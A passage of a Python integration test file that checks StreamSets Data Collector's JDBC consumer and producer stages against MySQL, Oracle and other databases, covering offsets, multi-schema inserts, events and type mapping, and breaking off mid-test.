def test_jdbc_multitable_consumer_initial_offset_at_the_end(sdc_builder, sdc_executor, database):
"""
Set initial offset at the end of the table and verify that no records were read.
"""
table_name = get_random_string(string.ascii_lowercase, 10)
builder = sdc_builder.get_pipeline_builder()
jdbc_multitable_consumer = builder.add_stage('JDBC Multitable Consumer')
jdbc_multitable_consumer.table_configs = [{
"tablePattern": table_name,
"overrideDefaultOffsetColumns": True,
"offsetColumns": ["id"],
"offsetColumnToInitialOffsetValue": [{
"key": "id",
"value": "5"
}]
}]
trash = builder.add_stage('Trash')
jdbc_multitable_consumer >> trash
pipeline = builder.build().configure_for_environment(database)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(
table_name,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True, quote=True),
sqlalchemy.Column('name', sqlalchemy.String(32), quote=True)
)
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
logger.info('Adding three rows into %s database ...', database.type)
connection = database.engine.connect()
connection.execute(table.insert(), ROWS_IN_DATABASE)
sdc_executor.add_pipeline(pipeline)
sdc_executor.start_pipeline(pipeline)
# Since the pipeline is not meant to read anything, we 'simply' wait
time.sleep(5)
sdc_executor.stop_pipeline(pipeline)
# There must be no records read
history = sdc_executor.get_pipeline_history(pipeline)
assert history.latest.metrics.counter('pipeline.batchInputRecords.counter').count == 0
assert history.latest.metrics.counter('pipeline.batchOutputRecords.counter').count == 0
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine)
# SDC-10562: Row-level stage errors not being caught at pipeline
@sdc_min_version('3.0.0.0')
@database
def test_jdbc_producer_multirow_with_duplicates(sdc_builder, sdc_executor, database):
"""
Make sure that when using Multi Row insert, data related errors are send to error stream.
"""
if type(database) == SQLServerDatabase:
pytest.skip('This test is trying to insert explicit value to identity column which is not supported on SQL Server')
table_name = get_random_string(string.ascii_lowercase, 15)
builder = sdc_builder.get_pipeline_builder()
# Generate batch that will repeat the same primary key in the middle of the batch (on third row)
source = builder.add_stage('Dev Raw Data Source')
source.stop_after_first_batch = True
source.data_format = 'JSON'
source.raw_data = """{"id" : 1}\n{"id" : 2}\n{"id" : 1}\n{"id" : 3}"""
producer = builder.add_stage('JDBC Producer')
producer.table_name = table_name
producer.field_to_column_mapping = []
producer.default_operation = 'INSERT'
producer.use_multi_row_operation = True
if database.type == 'Oracle':
producer.enclose_object_names = True
source >> producer
pipeline = builder.build().configure_for_environment(database)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(
table_name,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True, quote=True)
)
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
sdc_executor.add_pipeline(pipeline)
sdc_executor.start_pipeline(pipeline).wait_for_finished()
# Since we are inserting duplicate primary key, the batch should fail
history = sdc_executor.get_pipeline_history(pipeline)
assert history.latest.metrics.counter('pipeline.batchInputRecords.counter').count == 4
assert history.latest.metrics.counter('pipeline.batchErrorRecords.counter').count == 4
assert history.latest.metrics.counter('pipeline.batchOutputRecords.counter').count == 0
# And similarly the database side should be empty as well
result = database.engine.execute(table.select())
data_from_database = result.fetchall()
result.close()
assert len(data_from_database) == 0
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine)
@database
def test_jdbc_producer_multitable(sdc_builder, sdc_executor, database):
"""Test for JDBC Producer with multiple destination table. We create 3 tables in the default schema and use an EL
expression to insert records according to the /table record field.
Pipeline:
dev_raw_data_source >> record_deduplicator >> jdbc_producer
record_deduplicator >> trash
"""
table1_name = _get_random_name(database, prefix='stf_table_')
table2_name = _get_random_name(database, prefix='stf_table_')
table3_name = _get_random_name(database, prefix='stf_table_')
table1 = _create_table(table1_name, database)
table2 = _create_table(table2_name, database)
table3 = _create_table(table3_name, database)
ROWS = [{'table': table1_name, 'id': 1, 'name': 'Roger Federer'},
{'table': table2_name, 'id': 2, 'name': 'Rafael Nadal'},
{'table': table3_name, 'id': 3, 'name': 'Dominic Thiem'}]
INPUT_DATA = '\n'.join(json.dumps(rec) for rec in ROWS)
pipeline_builder = sdc_builder.get_pipeline_builder()
pipeline = _create_jdbc_producer_pipeline(pipeline_builder, 'JDBC Producer Multitable Insert', INPUT_DATA,
"${record:value('/table')}", 'INSERT')
# JDBC Producer's "Table Name" property is converted to uppercase through the configure_for_environment() method
# when database is Oracle. However EL function names are case-sensitive; we overwrite it afterwards to avoid an EL
# error.
pipeline.configure_for_environment(database)
pipeline[2].set_attributes(table_name="${record:value('/table')}")
# For Oracle, the default value of JDBC Producer's "Schema Name" property in the database environment is the
# database name, but it should be the username instead.
if isinstance(database, OracleDatabase):
pipeline[2].set_attributes(schema_name=database.username.upper())
sdc_executor.add_pipeline(pipeline)
try:
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(len(ROWS))
sdc_executor.stop_pipeline(pipeline)
result1 = database.engine.execute(table1.select())
result2 = database.engine.execute(table2.select())
result3 = database.engine.execute(table3.select())
data1 = result1.fetchall()
data2 = result2.fetchall()
data3 = result3.fetchall()
assert data1 == [(ROWS[0]['name'], ROWS[0]['id'])]
assert data2 == [(ROWS[1]['name'], ROWS[1]['id'])]
assert data3 == [(ROWS[2]['name'], ROWS[2]['id'])]
result1.close()
result2.close()
result3.close()
finally:
logger.info('Dropping tables %s, %s, %s in %s database...', table1_name, table2_name, table3_name,
database.type)
table1.drop(database.engine)
table2.drop(database.engine)
table3.drop(database.engine)
# Test SDC-10719
@database
@sdc_min_version('3.8.0')
def test_jdbc_producer_multischema(sdc_builder, sdc_executor, database):
"""Test for JDBC Producer in a multischema scenario with a single destination table for each schema. We create 3
schemas with one table for each, with the same name. Then we use an EL expression to insert records according to
the /schema record field.
Pipeline:
dev_raw_data_source >> record_deduplicator >> jdbc_producer
record_deduplicator >> trash
"""
schema1_name = _get_random_name(database, prefix='stf_schema_')
schema2_name = _get_random_name(database, prefix='stf_schema_')
schema3_name = _get_random_name(database, prefix='stf_schema_')
table_name = _get_random_name(database, prefix='stf_table_')
_create_schema(schema1_name, database)
_create_schema(schema2_name, database)
_create_schema(schema3_name, database)
table1 = _create_table(table_name, database, schema_name=schema1_name)
table2 = _create_table(table_name, database, schema_name=schema2_name)
table3 = _create_table(table_name, database, schema_name=schema3_name)
ROWS = [{'schema': schema1_name, 'id': 1, 'name': 'Roger Federer'},
{'schema': schema2_name, 'id': 2, 'name': 'Rafael Nadal'},
{'schema': schema3_name, 'id': 3, 'name': 'Dominic Thiem'}]
INPUT_DATA = '\n'.join(json.dumps(rec) for rec in ROWS)
pipeline_builder = sdc_builder.get_pipeline_builder()
pipeline = _create_jdbc_producer_pipeline(pipeline_builder, 'JDBC Producer Multischema Insert', INPUT_DATA,
table_name, 'INSERT')
# JDBC Producer's "Schema Name" property is set through the `database` environment under some circumstances
# (e.g. Sql Server database). We overwrite it afterwards for the test.
pipeline.configure_for_environment(database)
pipeline[2].set_attributes(schema_name="${record:value('/schema')}")
sdc_executor.add_pipeline(pipeline)
try:
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(len(ROWS))
sdc_executor.stop_pipeline(pipeline)
result1 = database.engine.execute(table1.select())
result2 = database.engine.execute(table2.select())
result3 = database.engine.execute(table3.select())
data1 = result1.fetchall()
data2 = result2.fetchall()
data3 = result3.fetchall()
assert data1 == [(ROWS[0]['name'], ROWS[0]['id'])]
assert data2 == [(ROWS[1]['name'], ROWS[1]['id'])]
assert data3 == [(ROWS[2]['name'], ROWS[2]['id'])]
result1.close()
result2.close()
result3.close()
finally:
logger.info('Dropping table %s in schemas...', table_name)
table1.drop(database.engine)
table2.drop(database.engine)
table3.drop(database.engine)
logger.info('Dropping schemas %s, %s, %s...', schema1_name, schema2_name, schema3_name)
_drop_schema(schema1_name, database)
_drop_schema(schema2_name, database)
_drop_schema(schema3_name, database)
# Test SDC-10719
@database
@sdc_min_version('3.8.0')
def test_jdbc_producer_multischema_multitable(sdc_builder, sdc_executor, database):
"""Test a JDBC Producer in a multischema scenario with different destination tables for each schema. We create 3
schemas with one table for each, with different names. Then we use an EL expressions to insert records according to
the /schema and /table record fields.
There were a limitation in previous versions that affected to MySQL and MemSQL. These RDBMs do not differentiate
between schema and database. SDC used the database configured in the JDBC connection string, and looked for database
metadata filtering by database+schema. If the schema were other than the database of the connection string, metadata
could not be retrieved. This was a problem in a multischema scenario, where several schemas are employed.
Pipeline:
dev_raw_data_source >> record_deduplicator >> jdbc_producer
record_deduplicator >> trash
"""
schema1_name = _get_random_name(database, prefix='stf_schema_')
schema2_name = _get_random_name(database, prefix='stf_schema_')
schema3_name = _get_random_name(database, prefix='stf_schema_')
table1_name = _get_random_name(database, prefix='stf_table_')
table2_name = _get_random_name(database, prefix='stf_table_')
table3_name = _get_random_name(database, prefix='stf_table_')
_create_schema(schema1_name, database)
_create_schema(schema2_name, database)
_create_schema(schema3_name, database)
table1 = _create_table(table1_name, database, schema_name=schema1_name)
table2 = _create_table(table2_name, database, schema_name=schema2_name)
table3 = _create_table(table3_name, database, schema_name=schema3_name)
ROWS = [{'schema': schema1_name, 'table': table1_name, 'id': 1, 'name': 'Roger Federer'},
{'schema': schema2_name, 'table': table2_name, 'id': 2, 'name': 'Rafael Nadal'},
{'schema': schema3_name, 'table': table3_name, 'id': 3, 'name': 'Dominic Thiem'}]
INPUT_DATA = '\n'.join(json.dumps(rec) for rec in ROWS)
pipeline_builder = sdc_builder.get_pipeline_builder()
pipeline = _create_jdbc_producer_pipeline(pipeline_builder, 'JDBC Producer Multischema and Multitable Insert',
INPUT_DATA, "${record:value('/table')}", 'INSERT')
# JDBC Producer's "Schema Name" property is set through the `database` environment under some circumstances
# (e.g. Sql Server database). We overwrite it afterwards for the test.
pipeline.configure_for_environment(database)
pipeline[2].set_attributes(schema_name="${record:value('/schema')}")
# JDBC Producer's "Table Name" property is converted to uppercase through the configure_for_environment() method
# when database is Oracle. However EL function names are case-sensitive; we overwrite it afterwards to avoid an EL
# error.
pipeline[2].set_attributes(table_name="${record:value('/table')}")
sdc_executor.add_pipeline(pipeline)
try:
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(len(ROWS))
sdc_executor.stop_pipeline(pipeline)
result1 = database.engine.execute(table1.select())
result2 = database.engine.execute(table2.select())
result3 = database.engine.execute(table3.select())
data1 = result1.fetchall()
data2 = result2.fetchall()
data3 = result3.fetchall()
assert data1 == [(ROWS[0]['name'], ROWS[0]['id'])]
assert data2 == [(ROWS[1]['name'], ROWS[1]['id'])]
assert data3 == [(ROWS[2]['name'], ROWS[2]['id'])]
result1.close()
result2.close()
result3.close()
finally:
logger.info('Dropping tables %s, %s, %s...', table1_name, table2_name, table3_name)
table1.drop(database.engine)
table2.drop(database.engine)
table3.drop(database.engine)
logger.info('Dropping schemas %s, %s, %s...', schema1_name, schema2_name, schema3_name)
_drop_schema(schema1_name, database)
_drop_schema(schema2_name, database)
_drop_schema(schema3_name, database)
# SDC-11063: Do not reoder update statements in JDBC destination
@sdc_min_version('3.0.0.0')
@pytest.mark.parametrize('multi_row', [True, False])
@database
def test_jdbc_producer_ordering(sdc_builder, sdc_executor, multi_row, database):
"""Ensure that variously intertwined operations won't be executed out of order in harmful way."""
table_name = get_random_string(string.ascii_lowercase, 20)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(
table_name,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True, quote=True, autoincrement=False),
sqlalchemy.Column('a', sqlalchemy.Integer, quote=True),
sqlalchemy.Column('b', sqlalchemy.Integer, quote=True)
)
RAW_DATA = [
# Update id=5
{"op": 3, "id": 5, "a": 2, "b": 2},
# Insert id=4
{"op": 1, "id": 4, "a": 1, "b": 1},
# Update id=4
{"op": 3, "id": 4, "a": 2, "b": 2},
# Delete id=5
{"op": 2, "id": 5},
# Insert id=1
{"op": 1, "id": 1, "a": 1, "b": 1},
# Update id=1
{"op": 3, "id": 1, "a": 2},
# Insert id=2
{"op": 1, "id": 2, "a": 1, "b": 1},
# Delete id=2
{"op": 2, "id": 2},
# Update id=1
{"op": 3, "id": 1, "a": 2, "b": 2},
# Insert id=3
{"op": 1, "id": 3, "a": 1, "b": 1},
# Update id=1
{"op": 3, "id": 1, "a": 3},
# Update id=3
{"op": 3, "id": 3, "a": 5},
# Delete id=3
{"op": 2, "id": 3}
]
builder = sdc_builder.get_pipeline_builder()
source = builder.add_stage('Dev Raw Data Source')
source.stop_after_first_batch = True
source.data_format = 'JSON'
source.raw_data = '\n'.join(json.dumps(rec) for rec in RAW_DATA)
expression = builder.add_stage('Expression Evaluator')
expression.header_attribute_expressions = [
{'attributeToSet': 'sdc.operation.type', 'headerAttributeExpression': '${record:value("/op")}'}
]
remover = builder.add_stage('Field Remover')
remover.set_attributes(fields=['/op'], action='REMOVE')
producer = builder.add_stage('JDBC Producer')
producer.field_to_column_mapping = []
producer.default_operation = 'UPDATE'
producer.table_name = table_name
producer.use_multi_row_operation = multi_row
if database.type == 'Oracle':
producer.enclose_object_names = True
source >> expression >> remover >> producer
pipeline = builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
# The table will start with single row (id=5)
logger.info('Inserting rows into %s in %s database', table_name, database.type)
connection = database.engine.connect()
connection.execute(table.insert(), {'id': 5, 'a': 1, 'b': 1})
# Finally run the pipeline and verify it's outcome
sdc_executor.start_pipeline(pipeline).wait_for_finished()
result = database.engine.execute(table.select())
db = sorted(result.fetchall(), key=lambda row: row[0]) # order by id
result.close()
assert len(db) == 2
# id=1
assert 1 == db[0][0]
assert 3 == db[0][1]
assert 2 == db[0][2]
# id=5
assert 4 == db[1][0]
assert 2 == db[1][1]
assert 2 == db[1][2]
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
@sdc_min_version('3.0.0.0')
@database
def test_jdbc_multitable_events(sdc_builder, sdc_executor, database):
"""
Validate that we properly generate events
"""
if database.type == 'Oracle':
pytest.skip("This test depends on auto-created ID that doesn't work properly on Oracle")
table_prefix = get_random_string(string.ascii_lowercase, 20)
table_a = '{}_a'.format(table_prefix)
table_b = '{}_b'.format(table_prefix)
table_events = '{}_events'.format(table_prefix)
builder = sdc_builder.get_pipeline_builder()
source = builder.add_stage('JDBC Multitable Consumer')
source.transaction_isolation = 'TRANSACTION_READ_COMMITTED'
source.table_configs = [{
'tablePattern': f'{table_prefix}%',
"enableNonIncremental": True,
'tableExclusionPattern': table_events
}]
trash = builder.add_stage('Trash')
expression = builder.add_stage('Expression Evaluator')
expression.field_expressions = [{
'fieldToSet': '/tbl',
'expression': '${record:value("/table")}${record:value("/tables[0]")}'
}, {
'fieldToSet': '/tbls',
'expression': '${record:value("/tables[0]")},${record:value("/tables[1]")}'
}, {
'fieldToSet': '/event',
'expression': '${record:eventType()}'
}
]
producer = builder.add_stage('JDBC Producer')
producer.table_name = table_events
producer.default_operation = 'INSERT'
producer.field_to_column_mapping = [
dict(field='/event', columnName='event'),
dict(field='/tbl', columnName='tbl'),
dict(field='/tbls', columnName='tbls')
]
source >> trash
source >= expression
expression >> producer
pipeline = builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
# We need three tables for this test
metadata = sqlalchemy.MetaData()
a = sqlalchemy.Table(
table_a,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True)
)
b = sqlalchemy.Table(
table_b,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=False)
)
events = sqlalchemy.Table(
table_events,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column('event', sqlalchemy.String(50)),
sqlalchemy.Column('tbl', sqlalchemy.String(150)),
sqlalchemy.Column('tbls', sqlalchemy.String(150))
)
try:
logger.info('Creating tables %s, %s and %s in %s database ...', table_a, table_b, table_events, database.type)
a.create(database.engine)
b.create(database.engine)
events.create(database.engine)
logger.info('Inserting rows into %s and %s', table_a, table_b)
connection = database.engine.connect()
connection.execute(a.insert(), {'id': 1})
connection.execute(b.insert(), {'id': 1})
# Start the pipeline
status = sdc_executor.start_pipeline(pipeline)
# Read two records, generate 4 events, 6 records
status.wait_for_pipeline_output_records_count(6)
result = database.engine.execute(events.select())
db = sorted(result.fetchall(), key=lambda row: row[0]) # order by stamp
result.close()
assert len(db) == 4
tbls = set()
assert 'table-finished' == db[0][1]
tbls.add(db[0][2])
assert 'table-finished' == db[1][1]
tbls.add(db[1][2])
assert table_a in tbls
assert table_b in tbls
assert 'schema-finished' == db[2][1]
tbls = set(db[2][3].split(","))
assert table_a in tbls
assert table_b in tbls
assert 'no-more-data' == db[3][1]
# Portable truncate
events.drop(database.engine)
events.create(database.engine)
# Second iteration - insert one new row
logger.info('Inserting rows into %s', table_a)
connection = database.engine.connect()
connection.execute(a.insert(), {'id': 2})
# 1 record, 3 events more
status.wait_for_pipeline_output_records_count(10)
result = database.engine.execute(events.select())
db = sorted(result.fetchall(), key=lambda row: row[0]) # order by stamp
result.close()
assert len(db) == 3
assert 'table-finished' == db[0][1]
assert table_a == db[0][2]
assert 'schema-finished' == db[1][1]
tbls = set(db[1][3].split(","))
assert table_a in tbls
assert table_b in tbls
assert 'no-more-data' == db[2][1]
# Now let's stop the pipeline and start it again
# SDC-10022: Multitable JDBC Origin with non-incremental table does not properly trigger 'no-more-data' event
sdc_executor.stop_pipeline(pipeline)
# Portable truncate
events.drop(database.engine)
events.create(database.engine)
# Start the pipeline and wait for it to read three records (3 events)
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(3)
assert 'table-finished' == db[0][1]
assert table_a == db[0][2]
assert 'schema-finished' == db[1][1]
tbls = set(db[1][3].split(","))
assert table_a in tbls
assert table_b in tbls
assert 'no-more-data' == db[2][1]
finally:
sdc_executor.stop_pipeline(pipeline)
logger.info('Dropping tables %s, %s and %s in %s database...', table_a, table_b, table_events, database.type)
a.drop(database.engine)
b.drop(database.engine)
events.drop(database.engine)
# SDC-11092: Improve the ability of JDBC Destination to cover non-standard Data related SQL Error codes
@sdc_min_version('3.0.0.0')
@pytest.mark.parametrize('multi_row', [True, False])
@database('oracle')
def test_jdbc_producer_oracle_data_errors(sdc_builder, sdc_executor, multi_row, database):
"""Ensure that data related error in Oracle will be sent to eror stream rather then shutting the pipeline down."""
table_name = get_random_string(string.ascii_lowercase, 20)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(
table_name,
metadata,
sqlalchemy.Column('ID', sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column('STR', sqlalchemy.String(2)),
)
builder = sdc_builder.get_pipeline_builder()
source = builder.add_stage('Dev Raw Data Source')
source.stop_after_first_batch = True
source.data_format = 'JSON'
source.raw_data = '{"ID" : 1, "STR": "Longer then 2 characters"}'
producer = builder.add_stage('JDBC Producer')
producer.field_to_column_mapping = []
producer.default_operation = 'INSERT'
producer.table_name = table_name
producer.use_multi_row_operation = multi_row
source >> producer
pipeline = builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
sdc_executor.start_pipeline(pipeline).wait_for_finished()
# The table in database needs to be empty
result = database.engine.execute(table.select())
db = sorted(result.fetchall(), key=lambda row: row[0]) # order by id
result.close()
assert len(db) == 0
history = sdc_executor.get_pipeline_history(pipeline)
assert history.latest.metrics.counter('pipeline.batchInputRecords.counter').count == 1
assert history.latest.metrics.counter('pipeline.batchErrorRecords.counter').count == 1
assert history.latest.metrics.counter('pipeline.batchOutputRecords.counter').count == 0
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
table.drop(database.engine)
# SDC-11082: Extend support for TIMESTAMP WITH TIMEZONE Datatypes
@sdc_min_version('3.0.0.0')
@database('oracle')
# https://docs.oracle.com/cd/B28359_01/server.111/b28318/datatype.htm#CNCPT1821
# We don't support UriType (requires difficult workaround in JDBC)
@pytest.mark.parametrize('sql_type,insert_fragment,expected_type,expected_value', [
('number', '1', 'DECIMAL', '1'),
('char(2)', "'AB'", 'STRING', 'AB'),
('varchar(4)', "'ABCD'", 'STRING', 'ABCD'),
('varchar2(4)', "'NVAR'", 'STRING', 'NVAR'),
('nchar(3)', "'NCH'", 'STRING', 'NCH'),
('nvarchar2(4)', "'NVAR'", 'STRING', 'NVAR'),
('binary_float', '1.0', 'FLOAT', '1.0'),
('binary_double', '2.0', 'DOUBLE', '2.0'),
('date', "TO_DATE('1998-1-1 6:22:33', 'YYYY-MM-DD HH24:MI:SS')", 'DATETIME', 883635753000),
('timestamp', "TIMESTAMP'1998-1-2 6:00:00'", 'DATETIME', 883720800000),
('timestamp with time zone', "TIMESTAMP'1998-1-3 6:00:00-5:00'", 'ZONED_DATETIME', '1998-01-03T06:00:00-05:00'),
('timestamp with local time zone', "TIMESTAMP'1998-1-4 6:00:00-5:00'", 'ZONED_DATETIME', '1998-01-04T11:00:00Z'),
('long', "'LONG'", 'STRING', 'LONG'),
('blob', "utl_raw.cast_to_raw('BLOB')", 'BYTE_ARRAY', 'QkxPQg=='),
('clob', "'CLOB'", 'STRING', 'CLOB'),
('nclob', "'NCLOB'", 'STRING', 'NCLOB'),
('XMLType', "xmltype('<a></a>')", 'STRING', '<a></a>')
])
@pytest.mark.parametrize('use_table_origin', [True, False])
def test_jdbc_multitable_oracle_types(sdc_builder, sdc_executor, database, use_table_origin, sql_type, insert_fragment,
expected_type, expected_value):
"""Test all feasible Oracle types."""
table_name = get_random_string(string.ascii_lowercase, 20)
connection = database.engine.connect()
try:
# Create table
connection.execute(f"""
CREATE TABLE {table_name}(
id number primary key,
data_column {sql_type} NULL
)
""")
# And insert a row with actual value
connection.execute(f"INSERT INTO {table_name} VALUES(1, {insert_fragment})")
# And a null
connection.execute(f"INSERT INTO {table_name} VALUES(2, NULL)")
builder = sdc_builder.get_pipeline_builder()
if use_table_origin:
origin = builder.add_stage('JDBC Multitable Consumer')
origin.table_configs = [{"tablePattern": f'%{table_name}%'}]
origin.on_unknown_type = 'CONVERT_TO_STRING'
else:
origin = builder.add_stage('JDBC Query Consumer')
origin.sql_query = 'SELECT * FROM {0}'.format(table_name)
origin.incremental_mode = False
origin.on_unknown_type = 'CONVERT_TO_STRING'
trash = builder.add_stage('Trash')
origin >> trash
pipeline = builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
snapshot = sdc_executor.capture_snapshot(pipeline=pipeline, start_pipeline=True).snapshot
sdc_executor.stop_pipeline(pipeline)
assert len(snapshot[origin].output) == 2
record = snapshot[origin].output[0]
null_record = snapshot[origin].output[1]
# Since we are controlling types, we want to check explicit values inside the record rather the the python
# wrappers.
# TLKT-177: Add ability for field to return raw value
assert record.field['DATA_COLUMN'].type == expected_type
assert null_record.field['DATA_COLUMN'].type == expected_type
assert record.field['DATA_COLUMN']._data['value'] == expected_value
assert null_record.field['DATA_COLUMN'] == None
finally:
logger.info('Dropping table %s in %s database ...', table_name, database.type)
connection.execute(f"DROP TABLE {table_name}")
# SDC-11324: JDBC MultiTable origin can create duplicate offsets
@database('mysql')
def test_jdbc_multitable_duplicate_offsets(sdc_builder, sdc_executor, database):
"""Validate that we will not create duplicate offsets. """
table_name = get_random_string(string.ascii_lowercase, 10)
pipeline_builder = sdc_builder.get_pipeline_builder()
origin = pipeline_builder.add_stage('JDBC Multitable Consumer')
origin.table_configs = [{"tablePattern": table_name}]
origin.max_batch_size_in_records = 1
trash = pipeline_builder.add_stage('Trash')
origin >> trash
pipeline = pipeline_builder.build().configure_for_environment(database)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(
table_name,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column('name', sqlalchemy.String(32))
)
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
logger.info('Adding three rows into %s database ...', database.type)
connection = database.engine.connect()
connection.execute(table.insert(), ROWS_IN_DATABASE)
sdc_executor.add_pipeline(pipeline)
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(len(ROWS_IN_DATABASE))
sdc_executor.stop_pipeline(pipeline)
# We should have transition 4 records
history = sdc_executor.get_pipeline_history(pipeline)
assert history.latest.metrics.counter('pipeline.batchInputRecords.counter').count == len(ROWS_IN_DATABASE)
assert history.latest.metrics.counter('pipeline.batchOutputRecords.counter').count == len(ROWS_IN_DATABASE)
# And most importantly, validate offset
offset = sdc_executor.api_client.get_pipeline_committed_offsets(pipeline.id).response.json()
assert offset is not None
assert offset['offsets'] is not None
expected_offset = {
f"tableName={table_name};;;partitioned=false;;;partitionSequence=-1;;;partitionStartOffsets=;;;partitionMaxOffsets=;;;usingNonIncrementalLoad=false": "id=3",
"$com.streamsets.pipeline.stage.origin.jdbc.table.TableJdbcSource.offset.version$": "2"
}
assert offset['offsets'] == expected_offset
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine)
# SDC-11326: JDBC MultiTable origin forgets offset of non-incremental table on consecutive execution
@database('mysql')
@sdc_min_version('3.0.0.0')
def test_jdbc_multitable_lost_nonincremental_offset(sdc_builder, sdc_executor, database):
"""Validate the origin does not loose non-incremental offset on various runs."""
table_name = get_random_string(string.ascii_lowercase, 10)
pipeline_builder = sdc_builder.get_pipeline_builder()
origin = pipeline_builder.add_stage('JDBC Multitable Consumer')
origin.table_configs = [{"tablePattern": table_name, "enableNonIncremental": True}]
origin.max_batch_size_in_records = 1
trash = pipeline_builder.add_stage('Trash')
origin >> trash
pipeline = pipeline_builder.build().configure_for_environment(database)
metadata = sqlalchemy.MetaData()
table = sqlalchemy.Table(
table_name,
metadata,
sqlalchemy.Column('id', sqlalchemy.Integer, primary_key=False),
sqlalchemy.Column('name', sqlalchemy.String(32))
)
try:
logger.info('Creating table %s in %s database ...', table_name, database.type)
table.create(database.engine)
logger.info('Adding three rows into %s database ...', database.type)
connection = database.engine.connect()
connection.execute(table.insert(), ROWS_IN_DATABASE)
sdc_executor.add_pipeline(pipeline)
sdc_executor.start_pipeline(pipeline).wait_for_pipeline_output_records_count(len(ROWS_IN_DATABASE))
sdc_executor.stop_pipeline(pipeline)
# We should have read all the records
history = sdc_executor.get_pipeline_history(pipeline)
assert history.latest.metrics.counter('pipeline.batchInputRecords.counter').count == len(ROWS_IN_DATABASE)
assert history.latest.metrics.counter('pipeline.batchOutputRecords.counter').count == len(ROWS_IN_DATABASE)
# And most importantly, validate offset
offset = sdc_executor.api_client.get_pipeline_committed_offsets(pipeline.id).response.json()
assert offset is not None
assert offset['offsets'] is not None
expected_offset = {
f"tableName={table_name};;;partitioned=false;;;partitionSequence=-1;;;partitionStartOffsets=;;;partitionMaxOffsets=;;;usingNonIncrementalLoad=true": "completed=true",
"$com.streamsets.pipeline.stage.origin.jdbc.table.TableJdbcSource.offset.version$": "2"
}
assert offset['offsets'] == expected_offset
for _ in range(5):
sdc_executor.start_pipeline(pipeline)
# Since the pipeline won't read anything, give it few seconds to "idle"
time.sleep(2)
sdc_executor.stop_pipeline(pipeline)
# And it really should not have read anything!
history = sdc_executor.get_pipeline_history(pipeline)
assert history.latest.metrics.counter('pipeline.batchInputRecords.counter').count == 0
assert history.latest.metrics.counter('pipeline.batchOutputRecords.counter').count == 0
# And offset should not have changed
offset = sdc_executor.api_client.get_pipeline_committed_offsets(pipeline.id).response.json()
assert offset is not None
assert offset['offsets'] is not None
assert offset['offsets'] == expected_offset
finally:
logger.info('Dropping table %s in %s database...', table_name, database.type)
table.drop(database.engine)
@sdc_min_version('3.9.0')
@database('oracle')
def test_jdbc_multitable_oracle_split_by_timestamp_with_timezone(sdc_builder, sdc_executor, database):
"""Make sure that we can properly partition TIMESTAMP WITH TIMEZONE type."""
table_name = get_random_string(string.ascii_uppercase, 20)
table_name_dest = get_random_string(string.ascii_uppercase, 20)
connection = database.engine.connect()
comparing_query = f"""(
select * from {table_name}
minus
select * from {table_name_dest}
) union (
select * from {table_name_dest}
minus
select * from {table_name}
)"""
try:
# Create table
connection.execute(f"""
CREATE TABLE {table_name}(
ID number primary key,
TZ timestamp(6) with time zone
)
""")
# Create destination table
connection.execute(f"""CREATE TABLE {table_name_dest} AS SELECT * FROM {table_name} WHERE 1=0""")
# Insert a few rows
for m in range(0, 5):
for s in range(0, 59):
connection.execute(f"INSERT INTO {table_name} VALUES({m*100+s}, TIMESTAMP'2019-01-01 10:{m}:{s}-5:00')")
connection.execute("commit")
builder = sdc_builder.get_pipeline_builder()
origin = builder.add_stage('JDBC Multitable Consumer')
origin.table_configs = [{
"tablePattern": f'%{table_name}%',
"overrideDefaultOffsetColumns": True,
"offsetColumns": ["TZ"],
"enableNonIncremental": False,
"partitioningMode": "REQUIRED",
"partitionSize": "30",
"maxNumActivePartitions": -1
}]
origin.number_of_threads = 2
origin.maximum_pool_size = 2
origin.max_batch_size_in_records = 30
finisher = builder.add_stage('Pipeline Finisher Executor')
finisher.stage_record_preconditions = ['${record:eventType() == "no-more-data"}']
FIELD_MAPPINGS = [dict(field='/ID', columnName='ID'),
dict(field='/TZ', columnName='TZ')]
destination = builder.add_stage('JDBC Producer')
destination.set_attributes(default_operation='INSERT',
table_name=table_name_dest,
field_to_column_mapping=FIELD_MAPPINGS,
stage_on_record_error='STOP_PIPELINE')
origin >> destination
origin >= finisher
pipeline = builder.build().configure_for_environment(database)
sdc_executor.add_pipeline(pipeline)
sdc_executor.start_pipeline(pipeline).wait_for_finished()
result = [row.items() for row in connection.execute(comparing_query)]
assert len(result) == 0
# Insert few more rows and validate the outcome again
for m in range(6, 8):
for s in range(0, 59):
